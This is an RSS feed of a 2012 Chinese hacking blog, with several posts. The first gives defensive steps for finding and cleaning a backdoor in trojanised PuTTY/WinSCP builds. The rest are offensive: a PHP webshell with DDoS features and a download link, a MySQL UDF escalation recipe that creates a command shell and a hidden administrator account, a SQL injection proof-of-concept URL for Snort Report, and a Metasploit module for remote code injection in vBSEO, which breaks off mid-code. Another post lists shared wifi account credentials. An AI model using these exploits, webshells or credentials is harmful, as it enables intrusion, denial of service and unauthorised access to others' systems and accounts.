<?xml version="1.0" encoding="UTF-8"?>
<rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:sy="http://purl.org/rss/1.0/modules/syndication/" xmlns:admin="http://webns.net/mvcb/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns="http://purl.org/rss/1.0/">
<channel rdf:about="http://www.cnyzy.cn">
<title>影子鹰安全网络-主站技术BLOG</title>
<link>http://www.cnyzy.cn</link>
<description>影子鹰安全网络-主站技术BLOG</description>
<dc:language>zh-cn</dc:language>
<dc:creator>coolkawen@Gmail.com</dc:creator>
<items>
<rdf:Seq>
<item rdf:about="http://www.cnyzy.cn/blogview.asp?logID=1803"><title><![CDATA[putty和WinSCP后门检查及清理方式]]></title><description><![CDATA[检查及清理方式<br>&nbsp;<br>　　检查/var/log&nbsp;是否被删除#&nbsp;/usr/bin/stat&nbsp;/var/log<br>　　如果被删除了，说明中招了<br>　　查看/var/log&nbsp;文件夹内容#&nbsp;ls&nbsp;-al&nbsp;/var/log]]></description><content:encoded><![CDATA[<p id=fp>检查及清理方式<br>&nbsp;<br>　　检查/var/log&nbsp;是否被删除#&nbsp;/usr/bin/stat&nbsp;/var/log<br>　　如果被删除了，说明中招了<br>　　查看/var/log&nbsp;文件夹内容#&nbsp;ls&nbsp;-al&nbsp;/var/log<br>　　如果文件很少，说明中招了<br>　　监控名称为fsyslog,osysllog&nbsp;的进程#&nbsp;/usr/bin/watch&nbsp;-n&nbsp;1&nbsp;/bin/ps&nbsp;-AFZ&nbsp;f&nbsp;\|&nbsp;/bin/grep&nbsp;syslog<br>　　如果有名称为fsyslog或osyslog的进程，说明中招了，注意不要和正常的系统日志进程混淆<br>　　检查/etc/init.d/sshd&nbsp;的文件头是否被篡改过#&nbsp;/usr/bin/head&nbsp;/etc/init.d/sshd<br>　　检查/etc/init.d/sendmail&nbsp;的文件头是否被篡改过#&nbsp;/usr/bin/head&nbsp;/etc/init.d/sendmail<br>　　检查是否有对外链接的82&nbsp;端口#&nbsp;/bin/netstat&nbsp;-anp&nbsp;|&nbsp;/bin/grep&nbsp;&#39;:82&#39;<br>　　如果有，而你又没设置过，说明已经中招了<br>　　检查是否有链接到98.126.55.226&nbsp;的链接#&nbsp;/bin/netstat&nbsp;-anp&nbsp;|&nbsp;/bin/grep&nbsp;&#39;98\.&#39;&nbsp;--color<br>　　如果有，说明已经中招了<br>　　检查/etc&nbsp;文件夹下的隐藏文件.fsyslog&nbsp;.osyslog，检查/lib&nbsp;文件夹下的隐藏文件.fsyslog&nbsp;.osyslog<br>　　/usr/bin/find&nbsp;/etc&nbsp;-name&nbsp;&#39;.*&#39;&nbsp;-printf&nbsp;&#39;%a&nbsp;%c&nbsp;%t&nbsp;%M&nbsp;%g:%u&nbsp;%p\n&#39;&nbsp;|&nbsp;/bin/grep&nbsp;2012&nbsp;--color<br>　　/usr/bin/find&nbsp;/lib&nbsp;-name&nbsp;&#39;.*&#39;&nbsp;-printf&nbsp;&#39;%a&nbsp;%c&nbsp;%t&nbsp;%M&nbsp;%g:%u&nbsp;%p\n&#39;&nbsp;|&nbsp;/bin/grep&nbsp;2012&nbsp;--color<br>　　/usr/bin/find&nbsp;/etc&nbsp;-name&nbsp;&#39;syslog&#39;&nbsp;-printf&nbsp;&#39;%a&nbsp;%c&nbsp;%t&nbsp;%M&nbsp;%g:%u&nbsp;%p\n&#39;&nbsp;|&nbsp;/bin/grep&nbsp;2012&nbsp;--color<br>　　/usr/bin/find&nbsp;/lib&nbsp;-name&nbsp;&#39;syslog&#39;&nbsp;-printf&nbsp;&#39;%a&nbsp;%c&nbsp;%t&nbsp;%M&nbsp;%g:%u&nbsp;%p\n&#39;&nbsp;|&nbsp;/bin/grep&nbsp;2012&nbsp;--color<br>　　如果有近期修改过的名称包含fsyslog或osyslog的文件，说明已经中招了<br>&nbsp;<br>恢复系统日志<br>&nbsp;<br>　　查看系统日志文件夹#&nbsp;ls&nbsp;-al&nbsp;/var/log<br>　　创建系统日志文件夹#&nbsp;/bin/mkdir&nbsp;/var/log<br>　　如果被删除的话需要创建<br>　　查看系统日志服务#&nbsp;/usr/bin/find&nbsp;/etc/init.d/&nbsp;-name&nbsp;&#39;*log*&#39;<br>　　需要区分出你的服务器所使用的日志服务<br>　　关闭系统日志服务#&nbsp;/sbin/service&nbsp;syslog&nbsp;stop<br>　　你的服务器的日志服务的名称可能是另外一个名字<br>　　启动系统日志服务#&nbsp;/sbin/service&nbsp;syslog&nbsp;start<br>　　你的服务器的日志服务的名称可能是另外一个名字<br>　　创建错误登录日志文件#&nbsp;/bin/touch&nbsp;/var/log/btmp<br>　　设置错误登录日志文件用户组#&nbsp;/bin/chown&nbsp;root:utmp&nbsp;/var/log/btmp<br>　　设置错误登录日志文件权限#&nbsp;/bin/chmod&nbsp;600&nbsp;/var/log/btmp<br>　　创建登录日志文件#&nbsp;/bin/touch&nbsp;/var/log/wtmp<br>　　设置登录日志文件用户组#&nbsp;/bin/chown&nbsp;root:utmp&nbsp;/var/log/wtmp<br>　　设置登录日志文件权限#&nbsp;/bin/chmod&nbsp;664&nbsp;/var/log/wtmp<br>&nbsp;<br>恢复SELinux（安全增强Linux）设置<br>&nbsp;<br>　　查看SELinux&nbsp;状态#&nbsp;/usr/sbin/sestatus&nbsp;-v<br>　　检查/var/log&nbsp;文件夹的安全上下文#&nbsp;/sbin/restorecon&nbsp;-rn&nbsp;-vv&nbsp;/var/log<br>　　恢复/var/log&nbsp;文件夹的安全上下文#&nbsp;/sbin/restorecon&nbsp;-r&nbsp;-vv&nbsp;/var/log<br>　　检查/etc&nbsp;文件夹的安全上下文#&nbsp;/sbin/restorecon&nbsp;-rn&nbsp;-vv&nbsp;/etc&nbsp;2&gt;/dev/null<br>　　恢复/etc&nbsp;文件夹的安全上下文#&nbsp;/sbin/restorecon&nbsp;-r&nbsp;-vv&nbsp;/etc&nbsp;2&gt;/dev/null<br>　　检查/lib&nbsp;文件夹的安全上下文#&nbsp;/sbin/restorecon&nbsp;-rn&nbsp;-vv&nbsp;/lib&nbsp;2&gt;/dev/null<br></p>]]></content:encoded><link>http://www.cnyzy.cn/blogview.asp?logID=1803</link><dc:subject>黑客攻防</dc:subject><dc:creator>kawen</dc:creator><dc:date>2012-2-5 10:06:51</dc:date></item><item rdf:about="http://www.cnyzy.cn/blogview.asp?logID=1802"><title><![CDATA[集管理、压力测试、查询服务器等一体的PHP大马]]></title><description><![CDATA[本软件仅供爱好者研究测试之用！<br><br>首先，PHP&nbsp;DDOS&nbsp;是很久前的技术，现在发出来，综合了PHP&nbsp;大马的服务器提权测试功能。<br><br>集于管理、压力测试、菜刀通用、查询服务器信息等技术于一体。]]></description><content:encoded><![CDATA[<p id=fp>本软件仅供爱好者研究测试之用！<br><br>首先，PHP&nbsp;DDOS&nbsp;是很久前的技术，现在发出来，综合了PHP&nbsp;大马的服务器提权测试功能。<br><br>集于管理、压力测试、菜刀通用、查询服务器信息等技术于一体。<br><br>1&nbsp;管理就不多说，大家都知道。<br><br>2&nbsp;压力测试，用附带的工具进行测试，最小包1万，最大包65500，可以检测是否存在。<br><br>3&nbsp;菜刀通用，可用菜刀直接进行连接，密码为WEBSHELL登陆密码。&nbsp;&nbsp;新功能<br><br>4&nbsp;查询服务器信息，查询PR，收录，权重于一体，权重获取数据标准为爱站。<br><br>..其他的没什么多说的了，SHELL没有做免杀，原码，大家凑货使，以后自己加密。。<br><br>工具使用，添加完SHELL后要导出为config.ini，否则不自动保存的。<br><br><br>最后一点，ASP的WEBSHELL很多支持PHP的，附带一款ASPSHELL&nbsp;大家可以检测PHP&nbsp;，支持传入即可。<br><br><br>DDOS功能是以webshell当肉鸡,PHP&nbsp;很少掉鸡,威力还蛮大，大家自己测试吧。<br><br><br>官方网站&nbsp;&nbsp;<a href="http://www.aspmuma.org/&nbsp;" target="_blank">http://www.aspmuma.org/&nbsp;</a><br><br>官方下载地址&nbsp;&nbsp;<a href="http://www.aspmuma.org/Software/Catalog7/74.html" target="_blank">http://www.aspmuma.org/Software/Catalog7/74.html</a><br><br>作者EMAIL：liuaqiangbb@163.com<br><br><a target="_blank" rel="nofollow" href="http://222.aspmuma.org/UpLoadFile/phpddos%B9%A4%BE%DF.rar">下载</a></p>]]></content:encoded><link>http://www.cnyzy.cn/blogview.asp?logID=1802</link><dc:subject>资源共享</dc:subject><dc:creator>kawen</dc:creator><dc:date>2012-2-3 21:28:31</dc:date></item><item rdf:about="http://www.cnyzy.cn/blogview.asp?logID=1801"><title><![CDATA[MYSQL提权]]></title><description><![CDATA[1&nbsp;获得root密码<br><br>conn.php&nbsp;config.php<br><br>&nbsp;]]></description><content:encoded><![CDATA[<p id=fp>1&nbsp;获得root密码<br><br>conn.php&nbsp;config.php<br><br>&nbsp;<br><br>$dbhost&nbsp;=&nbsp;&#39;localhost&#39;;//&nbsp;数据库服务器<br><br>$dbuser&nbsp;=&nbsp;&#39;root&#39;;//&nbsp;数据库用户名<br><br>$dbpw&nbsp;=&nbsp;&#39;root&#39;;//&nbsp;数据库密码<br><br>$dbname&nbsp;=&nbsp;&#39;discuz&#39;;//&nbsp;数据库名<br><br>&nbsp;<br><br>&nbsp;<br><br>C:\Winnt\udf.dll&nbsp;&nbsp;&nbsp;&nbsp;2000<br><br>C:\Windows\udf.dll&nbsp;2003<br><br>&nbsp;<br><br>现在基本上win的服务器就这两个导出UDF.DLL<br><br>&nbsp;<br><br>create&nbsp;function&nbsp;cmdshell&nbsp;returns&nbsp;string&nbsp;soname&nbsp;&#39;udf.dll&#39;<br><br>select&nbsp;cmdshell(&#39;net&nbsp;user&nbsp;wjs&nbsp;wjs&nbsp;/add&#39;);&nbsp;&nbsp;<br><br>select&nbsp;cmdshell(&#39;net&nbsp;localgroup&nbsp;administrators&nbsp;wjs&nbsp;/add&#39;);&nbsp;&nbsp;<br><br>select&nbsp;cmdshell(&#39;C:/PHPnow/htdocs/3389.exe&#39;);&nbsp;&nbsp;这个是把开3389的文件放到C盘，然后运行，我们服务器开了3389就不需要执行这步<br><br>drop&nbsp;function&nbsp;cmdshell;&nbsp;删除函数<br><br>select&nbsp;cmdshell(&#39;netstat&nbsp;-an&#39;);&nbsp;这是查看端口查开放情况<br><br></p>]]></content:encoded><link>http://www.cnyzy.cn/blogview.asp?logID=1801</link><dc:subject>黑客攻防</dc:subject><dc:creator>kawen</dc:creator><dc:date>2012-2-3 9:57:55</dc:date></item><item rdf:about="http://www.cnyzy.cn/blogview.asp?logID=1800"><title><![CDATA[Snort Report <= 1.3.2 SQL]]></title><description><![CDATA[[b]Snort&nbsp;Report&nbsp;&lt;=&nbsp;1.3.2&nbsp;SQL&nbsp;Injection&nbsp;Vulnerability&nbsp;[/b]<br><br>##########################&nbsp;&nbsp;<br><br>Vulnerable&nbsp;parameter:&nbsp;&nbsp;]]></description><content:encoded><![CDATA[<p id=fp><strong>Snort&nbsp;Report&nbsp;&lt;=&nbsp;1.3.2&nbsp;SQL&nbsp;Injection&nbsp;Vulnerability&nbsp;</strong><br><br>##########################&nbsp;&nbsp;<br><br>Vulnerable&nbsp;parameter:&nbsp;&nbsp;<br><br>ipAddress&nbsp;&nbsp;<br><br>Vulnerable&nbsp;URL:&nbsp;&nbsp;<br><br><a href="http://server/ipdetail.php?type=dst&amp;FQDN=&amp;ipAddress=773116111&lt;SQLi&nbsp;Here&gt;&amp;beginTime=0&amp;endTime=1324665310&nbsp;&nbsp;" target="_blank">http://server/ipdetail.php?type=dst&amp;FQDN=&amp;ipAddress=773116111&lt;SQLi&nbsp;Here&gt;&amp;beginTime=0&amp;endTime=1324665310&nbsp;&nbsp;</a><br><br>PoC:&nbsp;&nbsp;<br><br><a href="http://server/ipdetail.php?type=dst&amp;FQDN=&amp;ipAddress=773116111%20AND%20%28SELECT%205849%20FROM%28SELECT%20COUNT%28" target="_blank">http://server/ipdetail.php?type=dst&amp;FQDN=&amp;ipAddress=773116111%20AND%20%28SELECT%205849%20FROM%28SELECT%20COUNT%28</a>*%29%2CCONCAT%280x3a79786a3a%2C%28MID%28%28IFNULL%28CAST%28CURRENT_USER%28%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%29%2C0x3a7578713a%2CFLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29&amp;beginTime=0&amp;endTime=1324665310&nbsp;&nbsp;<br><br>##########################&nbsp;&nbsp;<br><br>#&nbsp;Patched&nbsp;in&nbsp;v1.3.3&nbsp;<br></p>]]></content:encoded><link>http://www.cnyzy.cn/blogview.asp?logID=1800</link><dc:subject>黑客攻防</dc:subject><dc:creator>kawen</dc:creator><dc:date>2012-2-1 10:02:21</dc:date></item><item rdf:about="http://www.cnyzy.cn/blogview.asp?logID=1799"><title><![CDATA[中国移动，中国电信免费公共wifi密码]]></title><description><![CDATA[【中国移动公共wifi的密码】<br>卡号：15821275836密码：159258&nbsp;<br>卡号：15800449592密码：159258&nbsp;<br>卡号：15800449954密码：159258&nbsp;<br>卡号：15800449940密码：159258]]></description><content:encoded><![CDATA[<p id=fp>【中国移动公共wifi的密码】<br>卡号：15821275836密码：159258&nbsp;<br>卡号：15800449592密码：159258&nbsp;<br>卡号：15800449954密码：159258&nbsp;<br>卡号：15800449940密码：159258<br><br>中国电信但凡你的手机能搜到中国电信的chinanet的热点覆盖，全国公免账号07953591377密码3591377&nbsp;。<br><br>说明：<br>可能有很多人已经知道了，我只是给还不知道的人扫一下盲<br><br>可能有些人不知道怎么用，首先就是要你所在的地方能搜到移动或电信的公共wifi信号，目前此信号覆盖的还不是很广。但还是会有人能搜到吧，比如我！搜到之后先用你的设备连接移动的wifi网络，就会跳出网页，要你输入手机号和密码（就是我上面提供的那个），输入后可用的话，就可以上网了。</p>]]></content:encoded><link>http://www.cnyzy.cn/blogview.asp?logID=1799</link><dc:subject>业界资讯</dc:subject><dc:creator>kawen</dc:creator><dc:date>2012-2-1 10:01:06</dc:date></item><item rdf:about="http://www.cnyzy.cn/blogview.asp?logID=1798"><title><![CDATA[vBSEO <= 3.6.0 Injection Exploit]]></title><description><![CDATA[[b]vBSEO&nbsp;&lt;=&nbsp;3.6.0&nbsp;&quot;proc_deutf()&quot;&nbsp;Remote&nbsp;PHP&nbsp;Code&nbsp;Injection&nbsp;Exploit[/b]<br><br><br>require&nbsp;&#39;&#39;msf/core&#39;&#39;&nbsp;<br>]]></description><content:encoded><![CDATA[<p id=fp><strong>vBSEO&nbsp;&lt;=&nbsp;3.6.0&nbsp;&quot;proc_deutf()&quot;&nbsp;Remote&nbsp;PHP&nbsp;Code&nbsp;Injection&nbsp;Exploit</strong><br><br><br>require&nbsp;&#39;msf/core&#39;&nbsp;<br><br>class&nbsp;Metasploit3&nbsp;&lt;&nbsp;Msf::Exploit::Remote&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;include&nbsp;Msf::Exploit::Remote::HttpClient&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;def&nbsp;initialize(info&nbsp;=&nbsp;{})&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;super(update_info(info,&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#39;Name&#39;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=&gt;&nbsp;&#39;vBSEO&nbsp;&lt;=&nbsp;3.6.0&nbsp;&quot;proc_deutf()&quot;&nbsp;Remote&nbsp;PHP&nbsp;Code&nbsp;Injection&#39;,&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#39;Description&#39;&nbsp;&nbsp;&nbsp;&nbsp;=&gt;&nbsp;%q{&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;This&nbsp;module&nbsp;exploits&nbsp;a&nbsp;vulnerability&nbsp;in&nbsp;the&nbsp;&#39;proc_deutf()&#39;&nbsp;function&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;defined&nbsp;in&nbsp;/includes/functions_vbseocp_abstract.php.&nbsp;User&nbsp;input&nbsp;passed&nbsp;through&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#39;char_repl&#39;&nbsp;POST&nbsp;parameter&nbsp;isn&#39;t&nbsp;properly&nbsp;sanitized&nbsp;before&nbsp;being&nbsp;used&nbsp;in&nbsp;a&nbsp;call&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;to&nbsp;preg_replace()&nbsp;function&nbsp;which&nbsp;uses&nbsp;the&nbsp;&#39;e&#39;&nbsp;modifier.&nbsp;This&nbsp;can&nbsp;be&nbsp;exploited&nbsp;to&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;inject&nbsp;and&nbsp;execute&nbsp;arbitrary&nbsp;code&nbsp;leveraging&nbsp;the&nbsp;PHP&#39;s&nbsp;complex&nbsp;curly&nbsp;syntax.&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;},&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#39;Author&#39;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=&gt;&nbsp;&#39;EgiX&nbsp;&lt;n0b0d13s[at]gmail.com&gt;&#39;,&nbsp;#&nbsp;originally&nbsp;reported&nbsp;by&nbsp;the&nbsp;vendor&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#39;License&#39;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=&gt;&nbsp;MSF_LICENSE,&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#39;Version&#39;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=&gt;&nbsp;&#39;$Revision$&#39;,&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#39;References&#39;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=&gt;&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;[&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;[&#39;BID&#39;,&nbsp;&#39;51647&#39;],&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;[&#39;URL&#39;,&nbsp;&#39;<a href="http://www.vbseo.com/f5/vbseo-security-bulletin-all-supported-versions-patch-release-52783/&#39;" target="_blank">http://www.vbseo.com/f5/vbseo-security-bulletin-all-supported-versions-patch-release-52783/&#39;</a>],&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;],&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#39;Privileged&#39;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=&gt;&nbsp;false,&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#39;Payload&#39;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=&gt;&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#39;DisableNops&#39;&nbsp;=&gt;&nbsp;true,&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#39;Space&#39;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=&gt;&nbsp;8190,&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#39;Keys&#39;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=&gt;&nbsp;[&#39;php&#39;],&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;},&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#39;Platform&#39;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=&gt;&nbsp;[&#39;php&#39;],&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#39;Arch&#39;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=&gt;&nbsp;ARCH_PHP,&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#39;Targets&#39;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=&gt;&nbsp;[[&nbsp;&#39;Automatic&#39;,&nbsp;{&nbsp;}]],&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#39;DisclosureDate&#39;&nbsp;=&gt;&nbsp;&#39;Jan&nbsp;23&nbsp;2012&#39;,&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#39;DefaultTarget&#39;&nbsp;&nbsp;=&gt;&nbsp;0))&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;register_options(&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;[&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;OptString.new(&#39;URI&#39;,&nbsp;[true,&nbsp;&quot;The&nbsp;full&nbsp;URI&nbsp;path&nbsp;to&nbsp;vBulletin&quot;,&nbsp;&quot;/vb/&quot;]),&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;],&nbsp;self.class)&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;end&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;def&nbsp;check&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;flag&nbsp;=&nbsp;rand_text_alpha(rand(10)+10)&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;data&nbsp;=&nbsp;&quot;char_repl=&#39;{${print(#{flag})}}&#39;=&gt;&quot;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;uri&nbsp;=&nbsp;&#39;&#39;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;uri&nbsp;&lt;&lt;&nbsp;datastore[&#39;URI&#39;]&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;uri&nbsp;&lt;&lt;&nbsp;&#39;/&#39;&nbsp;if&nbsp;uri[-1,1]&nbsp;!=&nbsp;&#39;/&#39;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;uri&nbsp;&lt;&lt;&nbsp;&#39;vbseocp.php&#39;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;response&nbsp;=&nbsp;send_request_cgi({&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#39;method&#39;&nbsp;=&gt;&nbsp;&quot;POST&quot;,&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#39;uri&#39;&nbsp;=&gt;&nbsp;uri,&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#39;data&#39;&nbsp;=&gt;&nbsp;&quot;#{data}&quot;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;})&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;response.code&nbsp;==&nbsp;200&nbsp;and&nbsp;response.body&nbsp;=~&nbsp;/#{flag}/&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;return&nbsp;Exploit::CheckCode::Vulnerable&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;end&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;return&nbsp;Exploit::CheckCode::Safe&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;end&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;def&nbsp;exploit&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;datastore[&#39;CMD&#39;]&nbsp;&nbsp;<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb